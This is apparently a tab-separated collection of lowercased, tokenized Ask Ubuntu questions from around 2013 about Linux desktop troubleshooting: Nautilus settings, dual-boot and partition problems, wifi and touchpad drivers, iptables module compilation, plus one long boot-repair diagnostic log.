325518	how can i edit nautilus places sidebar and unity quicklist ?	i 'm running ubuntu 13.04 with nautilus 3.6 and i want to edit the nautilus places sidebar menu ( not bookmarks ) . by default have the following items : recent , home , desktop , documents , downloads , music , pictures , videos & trash . i wish : add folder to places ( not bookmarks ) . added folder must be present in unity quicklist ( right click nautilus icon in launcher ) . remove recent files ( default in nautilus 3.6 ) . rename trash to another name . how can i achieve these goals ? note : i tried editing ~/.config/user-dirs.dirs file , but not luck . is there another way to customize nautilus places menu ?
325525	wubi ca n't detect local copy of ubuntu-12.04.2-desktop-amd64.iso	this is driving me nuts ... wubi.exe is running with a perfect copy ( md5 checked ) of ubuntu 12.04.2 desktop amd64 alongside . yet it does not detect it somehow , and attempts to download a fresh copy . my internet is terrible for downloading at the moment , and i need the installation as soon as possible . log output note : the lines 07-28 15:55 debug tasklist : # # running get_iso ... 07-28 15:55 debug commonbackend : could not find any iso or cd , downloading one now anyone want to help me ?
325526	installed nautilus but not placed in menu	i am using xubuntu 13.04 . i have nautilus because i like it . but i have n't found them in the main menu . is there any way i can add them to main menu of xubuntu desktop.i have already check for the entries in the /usr/share/applications jai @ frank-jai : ~ $ sudo ls /usr/share/applications | grep nautilus [ sudo ] password for jai : brasero-nautilus.desktop nautilus-autorun-software.desktop nautilus-connect-server.desktop nautilus.desktop nautilus-folder-handler.desktop nautilus-home.desktop
325529	acessing a mounted partition	iâm new to linux based os . yesterday i installed ubuntu 13.04 . i partitioned my 500 gb hard disk into 3 partitions : 70 gb root , 2 gb swap and 464 gb extended . now i faced a new problem : i ca n't access the 464 gb drive . the drive is already mounted on the launch pad . when i look at the properties of that drive , it shows 463 gb as free . when i right click my mouse to create a new folder there is no option for that . can anybody help me sort out this problem please ?
325534	how can i fix an iptable_nat compilation issue on ubuntu 12.04 ?	i 'm facing a problem while compiling iptables module for my 12.04 ubuntu with kernel v. 3.7.1 . the problem began with my system unable to show the list of rules for all chains in nat table root : # iptables -- table nat -- list < br/ > root : # iptables v1.4.12 : ca n't initialize iptables table `nat ' : table does not exist ( do you need to insmod ? ) i also ca n't find iptable_nat.ko in /lib/modules/3.7.1/kernel/net/ipv4/netfilter folder , so it always returns error every time i execute modprobe iptable_nat . my next move is to compile all modules located in /usr/src/linux-3.7/net/ipv4/netfilter using with : # make m=net/ipv4/netfilter -j2 and after the compiling process finished , there are lots of .ko files except iptable_nat.ko in /usr/src/linux-3.7/net/ipv4/netfilter folder . i 've set ipv4 nat as m in the kernel configuration before the compilation started . how can i get iptable_nat.c compiled ?
325535	why is there a strange white border on gnome terminal ?	i am getting a strange white border for the gnome terminal in ubuntu 13.04 . any suggestions as to how to remove it ? here 's a screeshot :
325540	ubuntu partition missing after installing windows vista	i have an old dell inspiron 1525 , which was only having ubuntu 13.04 installed previously . for reasons not relevant to this post , i had to install windows vista that originally came with this laptop . for installing windows , i moved the ubuntu installation to a logical partition . before installating windows , i had verified booting ubuntu 13.04 from the new partition . but after installing windows vista , the ubuntu partition is showing as unallocated . i have other partitions ( all ext4 ) and they are all intact . i have checked the partition layout with gparted and also windows disk managements . its only the ubuntu partition that is showing unallocated/free . is it possible to recover this ubuntu partition ? and if yes , what are the steps ?
325546	how to disable and enable keyboard in ubuntu ?	how to disable and enable keyboard in ubuntu ? i have a great trouble because i do n't have enough space to put both my keyboard and some other things on my desk . and accidentally pressing some key may cause trouble to the system . so i am looking for one way to lock my keyboard temporarily . of course i do n't want to plug out the keyboard from the computer because it is so inconvenient . how can i do with this ? xinput -list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb optical mouse id=9 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ chicony hp basic usb keyboard id=8 [ slave keyboard ( 3 ) ] ↳ hp wmi hotkeys id=10 [ slave keyboard ( 3 ) ]
325550	how do i view and access my windows 7 laptop from my ubuntu desktop ?	the desktop has 2 outputs for monitor display : can i plug in a vga chord from my laptop to the desktop ? and control ( the mouse and keyboard ) the laptop from my ubuntu desktop ? i was thinking of putting the output video from my windows 7 laptop to one of the ubuntu workspaces ? the laptop only has a vga output . i am not sure the desktop can pick up the signal from the laptop and output it in my desktop monitor . what are my options if i load ubuntu on my laptop as well ? will it be easier and what do i have to do ? i tried synergy but my desktop uses my laptop as a wireless hotspot , so they both have the same ip , therefore it doesnt work .
325556	android emulator	i installed virtualbox , but now what ? i 'm computer illiterate . there 's just one specific game i 'm trying to play . my smartphone was stolen in a home invasion and this is really the least of my problems , yet here i am . i downloaded the game , i downloaded virtualbox . the game says there is no device installed . opened virtualbox and got as far as this message : on the system page , you have assigned more than 50 % of your computer 's memory ( 1001.00 mb ) to the virtual machine . there might not be enough memory left for your host operating system . continue at your own risk .
325559	rtl82723ae-bt drivers for 12.04	i 've recently installed 12.04 on a zoostrom laptop . all is well apart from wifi and the webcam . i 'm using a âł12 dongle to solve the wifi problem , but it would be nice to be able to dispense with this at some stage . as i understand things - not very well - the problem is that the laptop is using a fairly new wireless chip , the rtl8273ae-bt , and the drivers for this chip are not included in the current 12.04 kernel . i 'm currently using 3.5.0-36 . there are a number of links advising on how to install the drivers , but i have n't managed to get these to work . however , i also understand that the drivers are included in 3.8 and that this is used by 13.04 . i do n't want to switch to 13.04 - i like using lts distributions - can anyone tell me whether : 1 the rtl8273ae-bt are in 3.8 and 2 whether 3.8 will eventually be used by 12.04 and , if so 3 when ?
325560	multiple wireless adapters , which is under using ?	i 'm using ubuntu 13.04 on a dell e6410 . dell e6410 comes with a default wifi adapter : intel centrino advanced-n 6200 . i additionally plugged in a realtek rtl8192cu adaptor i can clearly see which adapter is under using from the right-top side of ubuntu 13.04 -- -- the network configuration icon . however , i 'm wondering , is there a way to show in the bash by using command line that : how many wifi adaptors on my system for now ? ifconfig only shows there are 2 wifi adaptors , and i can see wlan1 is under using , but which adapter corresponds to wlan1 ? and which adapter corresponds to wlan0 ? i can clearly see the mac addresses of two wifi adapters , but lsusb only shows the connected usb devices without showing their mac address . and the default wifi adapter coming with the laptop is not a usb device . lshw takes me such a long time to show clearly the mac address for centrino advanced-n 6200 and the mac address for realtek rtl8192cu . so , i 'm wondering , is there a simple but direct way to compare both wifi devices ?
325562	ibus not working on ubuntu 13.04	i have done all the steps to write in hangul ( korean ) . but i have had no luck . i have used ubuntu for 2 years now and ibus has worked on other versions of ubuntu . just not 13.04 . the weird things is is that it works in the dash . i can search in korean . i just ca n't type in korean anywhere else . does anyone know the solution ? thanks in advance .
325566	wifi is not working in ubuntu 12.10	i want to connect to wifi but there is no option for it in the network settings , though i am able to see the bluetooth option under wireless network . what should i do ? tell me if some patch is missing or am i somewhere wrong in connecting to wifi .
325573	`` install '' button is disabled in ubuntu ( 12.04 lts ) software center	until recently , i was able to download and install applications directly from the software center but now since the past few days , the `` install '' button is disabled at all times when i try and get an application . `` sudo apt-get '' works fine , but i would like to have the option of installing stuff directly from the software center . the screenshots below will make things clearer : ( as you will observe in both snaps , the install button is disabled ... ) i recently installed ubuntu and have been encountering this problem since day 2 . i am using ubuntu 12.04 lts on a dell inspiron 15r 64-bit . please someone help me out with this . thanks in advance : d
325575	`` install ubuntu along side windows 7 '' option is not showing	motherboard = asus f2 a85-m processor = amd a10 5800k hard drive seagate 2 tb i have installed windows 7 , now i want to install ubuntu 12.04 along side with windows , but , when i am inserting ubuntu 12.04 .iso cd , `` install ubuntu along side windows 7 '' option is not showing . instead it is showing only two options - `` erase disk and install ubuntu `` and `` something else '' only these two options . how to get rid of this problem.please help .
325577	installing ubuntu 13.04 on vmware	i have installed ubuntu 13.04 on a virtual machine using vmware v7.0 the problem is that the display is very slow and after investigation i found that 3d unity is not supported . is there a way to enable 3d unity support on ubuntu vmware machine ?
325588	windows 7 and ubuntu on two different hard disks ?	i 'm planning to install both windows 7 and ubuntu 13.04 on my desktop computer . i have two hard disks , one sized 250gb and one 160gb . i installed windows 7 on the larger one first and then tried to install ubuntu on the other one . problem : even though i am able to choose to install grub on the smaller hard disk ( /dev/sda ) , only the larger one ( /dev/sdb ) and its partitions is listed in the partitioning tool . but i do n't want to resize my windows partition in order to install ubuntu , when there is a whole hard disk free to use . does anyone have an idea why my second hard disk is not listed ? the hard disk order set in bios does not have any effect on this . thanks a lot ! ; )
325590	boot-repair not recovering , bios failing to see hdd	i have been advised to post here re : my phoenix bios not recognising ( and therefore booting ) from the hdd once ubuntu 13.04 was installed . i have pasted the contents of the boot-repair tool below , which seemed like it knew what to fix with the mbr of the hdd , but it still does not show in bios and fails to load the os . i have also recognised i am unable to even boot from the 13.04 live cd also , is this linked ? any help would be greatly appreciated . ===================================== boot info script e7fc706 + boot-repair extra info [ boot-info 3june2013 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 94 for . sda1 : __________________________________________________________________________ file system : ext4 boot sector type : grub2 ( v1.99-2.00 ) boot sector info : grub2 ( v1.99 ) is installed in the boot sector of sda1 and looks at sector 96990360 of the same hard drive for core.img . core.img is at this location and looks in partition 94 for . operating system : ubuntu 13.04 boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/i386-pc/core.img sda2 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 80.1 gb , 80060424192 bytes 255 heads , 63 sectors/track , 9733 cylinders , total 156368016 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 151,554,047 151,552,000 83 linux /dev/sda2 151,554,048 156,366,847 4,812,800 82 linux swap / solaris '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 a9c996a1-b93b-4ae0-bb25-c74083240520 ext4 /dev/sda2 ffc7825d-ed7e-4fda-ae65-ffb0a12c7b09 swap /dev/sr0 iso9660 ubuntu 12.04 lts i386 ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) =========================== sda1/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 a9c996a1-b93b-4ae0-bb25-c74083240520 else search -- no-floppy -- fs-uuid -- set=root a9c996a1-b93b-4ae0-bb25-c74083240520 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=10 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-a9c996a1-b93b-4ae0-bb25-c74083240520 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 a9c996a1-b93b-4ae0-bb25-c74083240520 else search -- no-floppy -- fs-uuid -- set=root a9c996a1-b93b-4ae0-bb25-c74083240520 fi linux /boot/vmlinuz-3.8.0-19-generic root=uuid=a9c996a1-b93b-4ae0-bb25-c74083240520 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.8.0-19-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-a9c996a1-b93b-4ae0-bb25-c74083240520 ' { menuentry 'ubuntu , with linux 3.8.0-19-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-19-generic-advanced-a9c996a1-b93b-4ae0-bb25-c74083240520 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 a9c996a1-b93b-4ae0-bb25-c74083240520 else search -- no-floppy -- fs-uuid -- set=root a9c996a1-b93b-4ae0-bb25-c74083240520 fi echo 'loading linux 3.8.0-19-generic ... ' linux /boot/vmlinuz-3.8.0-19-generic root=uuid=a9c996a1-b93b-4ae0-bb25-c74083240520 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.8.0-19-generic } menuentry 'ubuntu , with linux 3.8.0-19-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-19-generic-recovery-a9c996a1-b93b-4ae0-bb25-c74083240520 ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 a9c996a1-b93b-4ae0-bb25-c74083240520 else search -- no-floppy -- fs-uuid -- set=root a9c996a1-b93b-4ae0-bb25-c74083240520 fi echo 'loading linux 3.8.0-19-generic ... ' linux /boot/vmlinuz-3.8.0-19-generic root=uuid=a9c996a1-b93b-4ae0-bb25-c74083240520 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.8.0-19-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 a9c996a1-b93b-4ae0-bb25-c74083240520 else search -- no-floppy -- fs-uuid -- set=root a9c996a1-b93b-4ae0-bb25-c74083240520 fi linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 a9c996a1-b93b-4ae0-bb25-c74083240520 else search -- no-floppy -- fs-uuid -- set=root a9c996a1-b93b-4ae0-bb25-c74083240520 fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda1/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda1 during installation uuid=a9c996a1-b93b-4ae0-bb25-c74083240520 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda2 during installation uuid=ffc7825d-ed7e-4fda-ae65-ffb0a12c7b09 none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) 38.135612488 = 40.947802112 boot/grub/grub.cfg 1 38.139686584 = 40.952176640 boot/grub/i386-pc/core.img 1 38.134609222 = 40.946724864 boot/vmlinuz-3.8.0-19-generic 1 38.134609222 = 40.946724864 vmlinuz 1 1.195560455 = 1.283723264 boot/initrd.img-3.8.0-19-generic 2 1.195560455 = 1.283723264 initrd.img 2 =============================== stderr messages : =============================== cat : write error : broken pipe cat : write error : broken pipe additional information : =================== log of boot-repair 2013-07-28__09h35 =================== boot-repair version : 3.199~ppa6~precise boot-sav version : 3.199~ppa6~precise glade2script version : 3.2.2~ppa45~precise boot-sav-extra version : 3.199~ppa6~precise boot-repair is executed in live-session ( ubuntu 12.04 lts , precise , ubuntu , i686 ) ls : can not access /home/usr/.config : no such file or directory cpu op-mode ( s ) : 32-bit file=/cdrom/preseed/ubuntu.seed boot=casper initrd=/casper/initrd.lz quiet splash -- maybe-ubiquity =================== os-prober : /dev/sda1 : ubuntu 13.04 ( 13.04 ) : ubuntu : linux =================== blkid : /dev/loop0 : type= '' squashfs '' /dev/sr0 : label= '' ubuntu 12.04 lts i386 '' type= '' iso9660 '' /dev/sda1 : uuid= '' a9c996a1-b93b-4ae0-bb25-c74083240520 '' type= '' ext4 '' /dev/sda2 : uuid= '' ffc7825d-ed7e-4fda-ae65-ffb0a12c7b09 '' type= '' swap '' 1 disks with os , 1 os : 1 linux , 0 macos , 0 windows , 0 unknown type os . =================== sda1/etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' =================== sda1/etc/grub.d/ : drwxr-xr-x 2 root root 4096 apr 24 17:06 grub.d total 72 -rwxr-xr-x 1 root root 7541 apr 9 09:28 00_header -rwxr-xr-x 1 root root 5974 apr 9 08:53 05_debian_theme -rwxr-xr-x 1 root root 11381 apr 9 09:28 10_linux -rwxr-xr-x 1 root root 10258 apr 9 09:28 20_linux_xen -rwxr-xr-x 1 root root 1688 dec 5 2012 20_memtest86+ -rwxr-xr-x 1 root root 10976 apr 9 09:28 30_os-prober -rwxr-xr-x 1 root root 1426 apr 9 09:28 30_uefi-firmware -rwxr-xr-x 1 root root 214 apr 9 09:28 40_custom -rwxr-xr-x 1 root root 216 apr 9 09:28 41_custom -rw-r -- r -- 1 root root 483 apr 9 09:28 readme =================== uefi/legacy mode : this live-session is not efi-compatible . secureboot maybe enabled . =================== partitions & disks : sda1 : sda , not-sepboot , grubenv-ok grub2 , grub-pc , update-grub , 32 , with-boot , is-os , not -- efi -- part , fstab-without-boot , fstab-without-efi , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , apt-get , grub-install , with -- usr , fstab-without-usr , not-sep-usr , standard , not-far , /mnt/boot-sav/sda1 . sda : not-gpt , biosboot-not-needed , has-no-efipart , not-usb , has-os , 2048 sectors * 512 bytes =================== parted -l : model : ata samsung sv8004h ( scsi ) disk /dev/sda : 80.1gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 77.6gb 77.6gb primary ext4 boot 2 77.6gb 80.1gb 2464mb primary linux-swap ( v1 ) warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk ! =================== parted -lm : byt ; /dev/sda:80.1gb : scsi:512:512 : msdos : ata samsung sv8004h ; 1:1049kb:77.6gb:77.6gb : ext4 : :boot ; 2:77.6gb:80.1gb:2464mb : linux-swap ( v1 ) : : ; warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk ! =================== mount : /cow on / type overlayfs ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) /dev/sr0 on /cdrom type iso9660 ( ro , noatime ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) gvfs-fuse-daemon on /home/ubuntu/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=ubuntu ) gvfs-fuse-daemon on /root/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev ) /dev/sda1 on /mnt/boot-sav/sda1 type ext4 ( rw ) =================== ls : /sys/block/sda ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro sda1 sda2 size slaves stat subsystem trace uevent /sys/block/sr0 ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /dev ( filtered ) : agpgart autofs block bsg btrfs-control bus cdrom cdrw char console core cpu cpu_dma_latency disk dmfm dmmidi dri dvd dvdrw ecryptfs fb0 fd full fuse hpet input kmsg log lp0 mapper mcelog mem midi net network_latency network_throughput null oldmem parport0 port ppp psaux ptmx pts random rfkill rtc rtc0 sda sda1 sda2 sg0 sg1 shm snapshot snd sr0 stderr stdin stdout uinput urandom usbmon0 usbmon1 usbmon2 usbmon3 usbmon4 usbmon5 usbmon6 usbmon7 vga_arbiter zero ls /dev/mapper : control =================== df -th : filesystem type size used avail use % mounted on /cow overlayfs 1007m 427m 581m 43 % / udev devtmpfs 999m 12k 999m 1 % /dev tmpfs tmpfs 403m 780k 402m 1 % /run /dev/sr0 iso9660 702m 702m 0 100 % /cdrom /dev/loop0 squashfs 673m 673m 0 100 % /rofs tmpfs tmpfs 1007m 612k 1006m 1 % /tmp none tmpfs 5.0m 4.0k 5.0m 1 % /run/lock none tmpfs 1007m 76k 1007m 1 % /run/shm /dev/sda1 ext4 73g 4.1g 65g 6 % /mnt/boot-sav/sda1 =================== fdisk -l : disk /dev/sda : 80.1 gb , 80060424192 bytes 255 heads , 63 sectors/track , 9733 cylinders , total 156368016 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00074457 device boot start end blocks id system /dev/sda1 * 2048 151554047 75776000 83 linux /dev/sda2 151554048 156366847 2406400 82 linux swap / solaris partition outside the disk detected . =================== recommended repair recommended-repair this setting will reinstall the grub2 of sda1 into the mbr of sda . additional repair will be performed : unhide-bootmenu-10s unhide grub boot menu in sda1/etc/default/grub grub-install ( grub ) 2.00-13ubuntu3 , grub-install ( grub ) 2 . reinstall the grub of sda1 into the mbr of sda installation finished . no error reported . grub-install /dev/sda : exit code of grub-install /dev/sda:0 chroot /mnt/boot-sav/sda1 update-grub generating grub.cfg ... found linux image : /boot/vmlinuz-3.8.0-19-generic found initrd image : /boot/initrd.img-3.8.0-19-generic found memtest86+ image : /boot/memtest86+.bin unhide grub boot menu in sda1/boot/grub/grub.cfg boot successfully repaired . you can now reboot your computer . pastebinit packages needed w : failed to fetch cdrom : //ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) /dists/precise/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . could not install pastebinit please install the [ pastebinit ] packages . then try again .
325592	ubuntu 13.04 : problem with the synaptics touchpad on a acer aspire one zg5 ( aoa110 ) not detected	i have a little problem with the touchpad on my netbook , the hdd is gone , so i installed ubuntu on an usb key , but the touchpad , for some reason , is n't detected . i checked everything , the drivers are installed , everything is good , but it is n't detected when i do a xinput list , all i got is virtual core xtest pointer and my usb mouse . anybody would have a workaround for this ? i already tried the good ol ' psmouse settigns in the xorg.conf , to no avail . it 'd be great if someone could help me with that . thanks ! ( if you need any logs , just give me the command and i 'll drop them here . ) edit : also , could it be related to me using unetbootin to install ubuntu ? i read sometimes , it could cause this problem .
325598	using fbi as slideshow causes portrait images to autorotate	im using a raspberry pi running raspbian wheezy as a digital photo frame . the pi is configured to autologin on boot and execute a bash script that starts fbi as a slideshow , like so : fbi -noverbose -a -t 10 /home/pi/pictures/*.jpg /home/pi/pictures/*.png ive noticed that any portrait photos ( ie photos that are taller than they are wide ) are automatically rotated 90 degrees so that appear as landscape . if i remove the -nonverbose switch , the dimensions are displayed underneath each image and what was once a 480x640 pixel image is displayed as 640x480 . removing the -a autozoom switch doesnt help either . can anyone help get my photos displaying in their original orientation regardless of aspect ratio ?
325599	basic photo editing tool suggestions	well i 'm not a photographer and i 'm kind of noob at editing photos . xd i need something basic and free . like i 'll crop , resize , maybe use paint brush . also i need blur tool so that i can blur native 'text/photo ' from a screenshot . : ) a couple of basic filer ( for a few photos that needed to be posted in social media ) though it is not mandatory . using ubuntu 12.04
325601	mouse and ethernet not responding	i just tried to install ubuntu 13.04 alongside windows 8 and the mouse and ethernet did not work during installation and continued not on to work when it was completed . the keyboard works fine but it seems like i have to connect it to a usb 3 port . the mouse does n't respond anywhere . my motherboard is gigabyte 970a-ds3 . also , i tried to install ubuntu 12.10 with the same results ( i did n't finish the installation , i still have the 13.04 on my system ) . any suggestions ? on windows 8 all usb ports work fine .
